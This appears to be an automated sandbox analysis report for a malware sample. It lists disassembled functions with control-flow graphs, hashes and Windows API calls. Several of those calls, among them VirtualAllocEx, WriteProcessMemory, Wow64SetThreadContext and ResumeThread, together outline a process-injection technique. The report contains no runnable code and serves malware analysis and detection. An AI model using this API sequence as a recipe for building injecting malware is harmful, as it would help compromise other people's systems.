                                                    control_flow_graph 859 725e7e8-725e87d 861 725e8b6-725e8d6 859->861 862 725e87f-725e889 859->862 867 725e90f-725e93e 861->867 868 725e8d8-725e8e2 861->868 862->861 863 725e88b-725e88d 862->863 865 725e8b0-725e8b3 863->865 866 725e88f-725e899 863->866 865->861 869 725e89d-725e8ac 866->869 870 725e89b 866->870 878 725e977-725ea31 CreateProcessA 867->878 879 725e940-725e94a 867->879 868->867 871 725e8e4-725e8e6 868->871 869->869 872 725e8ae 869->872 870->869 873 725e909-725e90c 871->873 874 725e8e8-725e8f2 871->874 872->865 873->867 876 725e8f4 874->876 877 725e8f6-725e905 874->877 876->877 877->877 880 725e907 877->880 890 725ea33-725ea39 878->890 891 725ea3a-725eac0 878->891 879->878 881 725e94c-725e94e 879->881 880->873 883 725e971-725e974 881->883 884 725e950-725e95a 881->884 883->878 885 725e95c 884->885 886 725e95e-725e96d 884->886 885->886 886->886 887 725e96f 886->887 887->883 890->891 901 725ead0-725ead4 891->901 902 725eac2-725eac6 891->902 903 725eae4-725eae8 901->903 904 725ead6-725eada 901->904 902->901 905 725eac8 902->905 907 725eaf8-725eafc 903->907 908 725eaea-725eaee 903->908 904->903 906 725eadc 904->906 905->901 906->903 910 725eb0e-725eb15 907->910 911 725eafe-725eb04 907->911 908->907 909 725eaf0 908->909 909->907 912 725eb17-725eb26 910->912 913 725eb2c 910->913 911->910 912->913
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0725EA1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 4ec3b965ed1e92ed28963d3067f73a42bf5519c765a11bde6dc329faa14b9f54
                                                    • Instruction ID: cf8a65e4b29edc835e2dcbd5ccdd694f972a7f1f5585e3e204042760c1371dcd
                                                    • Opcode Fuzzy Hash: 4ec3b965ed1e92ed28963d3067f73a42bf5519c765a11bde6dc329faa14b9f54
                                                    • Instruction Fuzzy Hash: B0916DB1D1021ACFDF20CF68C8457ADBBB6FF44314F1585A9D819AB280DB749A85CF91
                                                    Function 013EBA97 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 915 13eba97-13ebab7 916 13ebab9-13ebac6 call 13eb738 915->916 917 13ebae3-13ebae7 915->917 924 13ebadc 916->924 925 13ebac8 916->925 918 13ebafb-13ebb3c 917->918 919 13ebae9-13ebaf3 917->919 926 13ebb3e-13ebb46 918->926 927 13ebb49-13ebb57 918->927 919->918 924->917 972 13ebace call 13ebd30 925->972 973 13ebace call 13ebd40 925->973 926->927 929 13ebb7b-13ebb7d 927->929 930 13ebb59-13ebb5e 927->930 928 13ebad4-13ebad6 928->924 931 13ebc18-13ebcd8 928->931 932 13ebb80-13ebb87 929->932 933 13ebb69 930->933 934 13ebb60-13ebb67 call 13eb744 930->934 965 13ebcda-13ebcdd 931->965 966 13ebce0-13ebd0b GetModuleHandleW 931->966 936 13ebb89-13ebb91 932->936 937 13ebb94-13ebb9b 932->937 935 13ebb6b-13ebb79 933->935 934->935 935->932 936->937 939 13ebb9d-13ebba5 937->939 940 13ebba8-13ebbb1 call 13eb754 937->940 939->940 946 13ebbbe-13ebbc3 940->946 947 13ebbb3-13ebbbb 940->947 948 13ebbc5-13ebbcc 946->948 949 13ebbe1-13ebbe5 946->949 947->946 948->949 951 13ebbce-13ebbde call 13eb764 call 13eb774 948->951 970 13ebbe8 call 13ec040 949->970 971 13ebbe8 call 13ec011 949->971 951->949 952 13ebbeb-13ebbee 955 13ebbf0-13ebc0e 952->955 956 13ebc11-13ebc17 952->956 955->956 965->966 967 13ebd0d-13ebd13 966->967 968 13ebd14-13ebd28 966->968 967->968 970->952 971->952 972->928 973->928
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 013EBCFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 14300461fcfeb072b11d723216b8e3baeae319d610cabd8a3a7075a9cba05065
                                                    • Instruction ID: 0c6eeadc59744a08445a779c6c3c4002d26905308f555952973f36838f254e71
                                                    • Opcode Fuzzy Hash: 14300461fcfeb072b11d723216b8e3baeae319d610cabd8a3a7075a9cba05065
                                                    • Instruction Fuzzy Hash: 6F816670A00B568FDB26DF29D44479ABBF1FF88308F04892ED486D7A98D735E845CB91
                                                    Function 02F726A8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 974 2f726a8-2f72716 975 2f72721-2f72728 974->975 976 2f72718-2f7271e 974->976 977 2f72733-2f7276b 975->977 978 2f7272a-2f72730 975->978 976->975 979 2f72773-2f727d2 CreateWindowExW 977->979 978->977 980 2f727d4-2f727da 979->980 981 2f727db-2f72813 979->981 980->981 985 2f72815-2f72818 981->985 986 2f72820 981->986 985->986 987 2f72821 986->987 987->987
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F727C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: bccd55a5744dd83c18843dee570ed4c6fc65cfeb2d3087159b3268545ed5fd72
                                                    • Instruction ID: 4533929ad8ac1b485e840a2b8673a33e23ff75be801c3a2b05b77aeefe587b35
                                                    • Opcode Fuzzy Hash: bccd55a5744dd83c18843dee570ed4c6fc65cfeb2d3087159b3268545ed5fd72
                                                    • Instruction Fuzzy Hash: 5151CEB1D003499FDF14CFA9C984ADEBBB5BF48350F64822AE819AB250D7759885CF90
                                                    Function 02F726B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 988 2f726b0-2f72716 989 2f72721-2f72728 988->989 990 2f72718-2f7271e 988->990 991 2f72733-2f727d2 CreateWindowExW 989->991 992 2f7272a-2f72730 989->992 990->989 994 2f727d4-2f727da 991->994 995 2f727db-2f72813 991->995 992->991 994->995 999 2f72815-2f72818 995->999 1000 2f72820 995->1000 999->1000 1001 2f72821 1000->1001 1001->1001
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F727C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 642960a2eb8f2ce17c552ac5ed8be0b234473d7f52f86232c7cceedc709ff7eb
                                                    • Instruction ID: a261512906d56d40d8e63aaecbe3e7a8408746db12c98d6694cfb9c70a85e5e2
                                                    • Opcode Fuzzy Hash: 642960a2eb8f2ce17c552ac5ed8be0b234473d7f52f86232c7cceedc709ff7eb
                                                    • Instruction Fuzzy Hash: 6641CFB1D003499FDF14CF9AC984ADEBBB5FF48350F64812AE819AB250D775A885CF90
                                                    Function 013E6524 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 013E65E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 6f9f55288f543fa654782aa36af6429e8fb501558d68cf8024c93931999df973
                                                    • Instruction ID: fc2ddca771bb36ff444424cbf914b28671bc159090a2d9adefe6e1ac253c0e92
                                                    • Opcode Fuzzy Hash: 6f9f55288f543fa654782aa36af6429e8fb501558d68cf8024c93931999df973
                                                    • Instruction Fuzzy Hash: F541E0B0C00719CFDB24CFA9C949B9EBBF5BF45314F20806AD408AB295DBB56945CF90
                                                    Function 02F71C14 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 02F74D41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: f5dfe653f658264e0959028ddfc9e8ab33f313a40fe6bfae82995366514b4b91
                                                    • Instruction ID: 151e4892f98988d575a0c3c3204744dab0cc6634f94140004617be6ffcd50b68
                                                    • Opcode Fuzzy Hash: f5dfe653f658264e0959028ddfc9e8ab33f313a40fe6bfae82995366514b4b91
                                                    • Instruction Fuzzy Hash: A7411AB5A00205CFDB14CF99C888BAABBF5FF88314F25C45AD559A7321D774A841CFA0
                                                    Function 013E4D48 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 013E65E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: d0b748150b3ddc1f2e23e4837a32f2ea0102ec1bf31b2dd1f43884e4ad5aef74
                                                    • Instruction ID: 702e3e6474d328e94c2516367b93d9b6c918ce1404c9896219d9467c0aa7c805
                                                    • Opcode Fuzzy Hash: d0b748150b3ddc1f2e23e4837a32f2ea0102ec1bf31b2dd1f43884e4ad5aef74
                                                    • Instruction Fuzzy Hash: 1441D2B0D0072DCBDB24CFA9C949B9EBBF5BF54304F24806AD408AB255DBB56945CF90
                                                    Function 0725E560 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0725E5F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: da32ebbe725d37c0e08609e72ebd6a6abbbb6333c0e4ba1a2335d661bd8526a5
                                                    • Instruction ID: 4b2e2cb29eb02307195e64fdd1a307ab89dc787419986a3c832d60282f8e5475
                                                    • Opcode Fuzzy Hash: da32ebbe725d37c0e08609e72ebd6a6abbbb6333c0e4ba1a2335d661bd8526a5
                                                    • Instruction Fuzzy Hash: 3B212AB1D003599FCB10CFA9C885BDEBBF5FF48310F108429E919A7240D7789544DBA0
                                                    Function 013EDF80 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013EE00F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 72e56b2b94ea6b4d2e8d6d5476de57cc343de110ca77bfbd1a5cc10f38ed09f7
                                                    • Instruction ID: c12a1157b21e3847b33352b05644df3ce00fb7a2d5a7dd64cfcc2791d90b9c52
                                                    • Opcode Fuzzy Hash: 72e56b2b94ea6b4d2e8d6d5476de57cc343de110ca77bfbd1a5cc10f38ed09f7
                                                    • Instruction Fuzzy Hash: 1221F4B5D003589FDB10CFAAD884ADEBFF4FB48324F24805AE914A7251D375A945CF60
                                                    Function 0725DF90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0725E00E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 534b4aee12b2f089a52633e18012a0bbc11833b777f8b53f5b44d48d0fed0ef9
                                                    • Instruction ID: 8c926683b0810159ac0b875837cd7236cd491a415c9a17f79ef959e932dc155c
                                                    • Opcode Fuzzy Hash: 534b4aee12b2f089a52633e18012a0bbc11833b777f8b53f5b44d48d0fed0ef9
                                                    • Instruction Fuzzy Hash: A52129B1D103098FDB10DFAAC485BEEBBF4EF48324F14842AD559AB240C778A945CFA1
                                                    Function 0725E650 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0725E6D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: fba263e9519336144f206bbe200378eef86fa3895df0c3a530f9ecf2cb157604
                                                    • Instruction ID: 7481b5c768096ca3f6d6cece1938fe6f6611940eb845d63074553868620b64f1
                                                    • Opcode Fuzzy Hash: fba263e9519336144f206bbe200378eef86fa3895df0c3a530f9ecf2cb157604
                                                    • Instruction Fuzzy Hash: 482128B1D003599FCB10DFAAC881ADEBBF5FF48320F50842AE919A7240C7799540DBA0
                                                    Function 013EDF88 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013EE00F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 77c7e958fd3ab762962af6a07ee0e3255099ec7f5f5759b973c2e44d7bcda4ec
                                                    • Instruction ID: f495f19007dad6f1edd49ff46fe406f43ba9bc38d2e64b70e6ccfea64d38db04
                                                    • Opcode Fuzzy Hash: 77c7e958fd3ab762962af6a07ee0e3255099ec7f5f5759b973c2e44d7bcda4ec
                                                    • Instruction Fuzzy Hash: 0C21E4B59003599FDB10CF9AD984ADEBFF8FB48320F14841AE914A7350D379A944CFA5
                                                    Function 013EB7A0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD79,00000800,00000000,00000000), ref: 013EBF8A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 6700e8f6dee2e4dd31ca64091026a275e23945fa9a3861d71c4e83750fc172bc
                                                    • Instruction ID: b8e39d96547bfffca9a5ce34acaa7fc4c12246deb4d0e795b3c856aeec6adc3e
                                                    • Opcode Fuzzy Hash: 6700e8f6dee2e4dd31ca64091026a275e23945fa9a3861d71c4e83750fc172bc
                                                    • Instruction Fuzzy Hash: A71114B69043198FDB10CF9AD848BDEFBF8EB88324F14842EE519A7240C375A545CFA4
                                                    Function 013EBF18 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD79,00000800,00000000,00000000), ref: 013EBF8A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 454d5e547ac862d73c76ed06d153d71ca6ba852588dc3ed83ae79bb2a9d89ae8
                                                    • Instruction ID: 754dccfd64594df24cd28c2e904e7b4c99bc339b943f7428bc6beb39500af09b
                                                    • Opcode Fuzzy Hash: 454d5e547ac862d73c76ed06d153d71ca6ba852588dc3ed83ae79bb2a9d89ae8
                                                    • Instruction Fuzzy Hash: DA1114B69003498FDB14CFAAD444BDEFBF4EB48314F14842EE559A7240C375A546CFA5
                                                    Function 0725E4A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0725E50E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: b9fc31db0233f908620e4d157b6900b2dd26835d2a32bf95117a5aab0bea3c2b
                                                    • Instruction ID: 6744b20f0263877b33eee0cdc88eb3253e70477ae2eaaf5aacfc82bced860e4a
                                                    • Opcode Fuzzy Hash: b9fc31db0233f908620e4d157b6900b2dd26835d2a32bf95117a5aab0bea3c2b
                                                    • Instruction Fuzzy Hash: 751137B19002499FCB10DFAAC845BDFBFF5EF88320F248819E519AB250C775A540DFA1
                                                    Function 013EBFC0 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013EBD79,00000800,00000000,00000000), ref: 013EBF8A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 4e451f8423e4f8a3c75ad84f0ca25834925327fb801c22d0e02be408ef950056
                                                    • Instruction ID: 2e39ccd5cba0c4c27606959bcc33dc3b60a99d071a742ec64c9ba813a98b8d5a
                                                    • Opcode Fuzzy Hash: 4e451f8423e4f8a3c75ad84f0ca25834925327fb801c22d0e02be408ef950056
                                                    • Instruction Fuzzy Hash: 10118E768053459FDB168BA8D804BEAFBF4EF45328F14805BE505E7260C37A994ACFA0
                                                    Function 05022C28 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05022C88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: ebf8e2b99ea2509e479326c7c53a4665c37604b7bb136f6295b1fd8205552e8f
                                                    • Instruction ID: c97239d238bcf15215445f449a6a59cbfd3711049ed6dbf743151625dc7b7342
                                                    • Opcode Fuzzy Hash: ebf8e2b99ea2509e479326c7c53a4665c37604b7bb136f6295b1fd8205552e8f
                                                    • Instruction Fuzzy Hash: 901155B580035A8FCB10DF9AD585BDEFBF4EB48320F20841AD468A7240C738A545CFA1
                                                    Function 0725DEE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: cb0da615ffb8f093ba9d61514646442c5bdbe54954482027ca1a74b369b8cfcd
                                                    • Instruction ID: 1c1b0e7a161771a691f4ffc06a0683f3a961845a5d945be1afd2132c7baafb00
                                                    • Opcode Fuzzy Hash: cb0da615ffb8f093ba9d61514646442c5bdbe54954482027ca1a74b369b8cfcd
                                                    • Instruction Fuzzy Hash: 9B110AB1D003498FDB20DFAAD44579EFBF5EF88324F248419D519A7240C7796944CB95
                                                    Function 05021668 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 050216CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: a36b7c29f8741e5d2a4acfa10f3b71f2ffd539775e38a5ab00e8caa05875bc53
                                                    • Instruction ID: ed1afdcb91b1f9fa887861d51dfbadcaaa57c2f9294f0aa5191d05f64256d134
                                                    • Opcode Fuzzy Hash: a36b7c29f8741e5d2a4acfa10f3b71f2ffd539775e38a5ab00e8caa05875bc53
                                                    • Instruction Fuzzy Hash: 2B11F5B58002599FCB10DF99D889BDEBBF8EB48324F14851AD959A7210C379A944CFA1
                                                    Function 013EBC98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 013EBCFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f4dd0084ee3e8880739b3c90b748bc848fc1d188a33363ba937462520acf5d6c
                                                    • Instruction ID: 75a703212be74ead991d59c6045d700f75d0fc9508c484a6355ab6f2b4c5b7ee
                                                    • Opcode Fuzzy Hash: f4dd0084ee3e8880739b3c90b748bc848fc1d188a33363ba937462520acf5d6c
                                                    • Instruction Fuzzy Hash: D0110FB5C0035A8FDB10CF9AD844B9EFBF9AB88224F20842AD419A7250C379A545CFA1
                                                    Function 05022C30 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 05022C88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 6e147e85432658d6bde2ec1360b83eab0597c21ab9a67d7760f6ad9db002ba4c
                                                    • Instruction ID: 9328673577189694618b8d61fe2ffbc659234cf463c7c7eca118bf61f5b12621
                                                    • Opcode Fuzzy Hash: 6e147e85432658d6bde2ec1360b83eab0597c21ab9a67d7760f6ad9db002ba4c
                                                    • Instruction Fuzzy Hash: 851133B580034A8FCB10DF9AD545BDEBBF4EB48320F20841AD518A7340C338A544CFA5
                                                    Function 05021670 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,?,?,?), ref: 050216CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 24724c336d4cc0d6b6ffa812097f2389129f8e7f0c3c9c19863b81e934ed615d
                                                    • Instruction ID: 0a5759fb6b6409c38771368dde77daf0a5c130565c33f475a6d7b198dba567aa
                                                    • Opcode Fuzzy Hash: 24724c336d4cc0d6b6ffa812097f2389129f8e7f0c3c9c19863b81e934ed615d
                                                    • Instruction Fuzzy Hash: 0A1103B58003499FCB10DF9AD889BDEBBF8FB48320F24841AD518A7200C375A544CFA1
                                                    Function 07298EE0 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Tesq
                                                    • API String ID: 0-136783293
                                                    • Opcode ID: 7673989ea9318e93a2ebee4602fc3a2527fa1e5ff968ec6d85c464f53e5322ab
                                                    • Instruction ID: d8a175ee18f904b03ac5559bcacea2731009fd8309ebaa1ed13fd911234a491b
                                                    • Opcode Fuzzy Hash: 7673989ea9318e93a2ebee4602fc3a2527fa1e5ff968ec6d85c464f53e5322ab
                                                    • Instruction Fuzzy Hash: 6A51D571B102168FCF15EB79C88896EBBF7EFC5220719852AE459D7391DF309C058790
                                                    Function 055B23A0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Xm^
                                                    • API String ID: 0-4192649903
                                                    • Opcode ID: 5532407f45819e8599ccf2e379304edbb160d48b61c602332a6fd33a1d3458df
                                                    • Instruction ID: 97b0e7dd2bbb78ae735ceb95b397ac977ed44292cb4533816f98d57399c2d506
                                                    • Opcode Fuzzy Hash: 5532407f45819e8599ccf2e379304edbb160d48b61c602332a6fd33a1d3458df
                                                    • Instruction Fuzzy Hash: DA31B1766042404FCB12DB78C4584EABFF2FF85204B5888D9D5469B252EB71980ACBA1
